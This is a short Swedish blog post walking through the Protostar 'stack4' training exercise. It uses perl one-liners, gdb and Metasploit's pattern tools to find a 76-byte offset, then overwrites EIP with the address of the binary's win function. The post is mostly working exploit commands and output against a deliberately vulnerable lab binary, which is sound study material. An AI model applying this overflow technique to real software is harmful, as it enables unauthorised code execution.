Protostar och stack4

Stack4

Ok skiljer sig inte så mycket från förra men vi slänger in lite tecken så testar
perl -e ‘print ”a”x69′ | ./stack4
Händer inget
user@protostar:/opt/protostar/bin$ perl -e ‘print ”a”x79′ | ./stack4
Segmentation fault
Så då är det som det står compiler padding. Och vad gör man då.
Jo pattern_create.rb 100 (från metasploit).
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

Och så slänger vi in det i gdb
(gdb) run
Starting program: /opt/protostar/bin/stack4
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

Program received signal SIGSEGV, Segmentation fault.
0x63413563 in ?? ()
Sen pattern_offset.rb 0x63413563
Och det blir 76
Så då ska vi trycka in 76 a och sen skriva över EIP till win funktionen då testar vi det.
nm stack4
080483f4 T win

user@protostar:/opt/protostar/bin$ perl -e ‘print ”a”x76 . ”\xf4\x83\x04\x08″‘ | ./stack4

code flow successfully changed
Segmentation fault
Worked like a charm.

Det här inlägget postades i Okategoriserade. Bokmärk permalänken.

Kommentera

E-postadressen publiceras inte. Obligatoriska fält är märkta *


*

Följande HTML-taggar och attribut är tillåtna: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>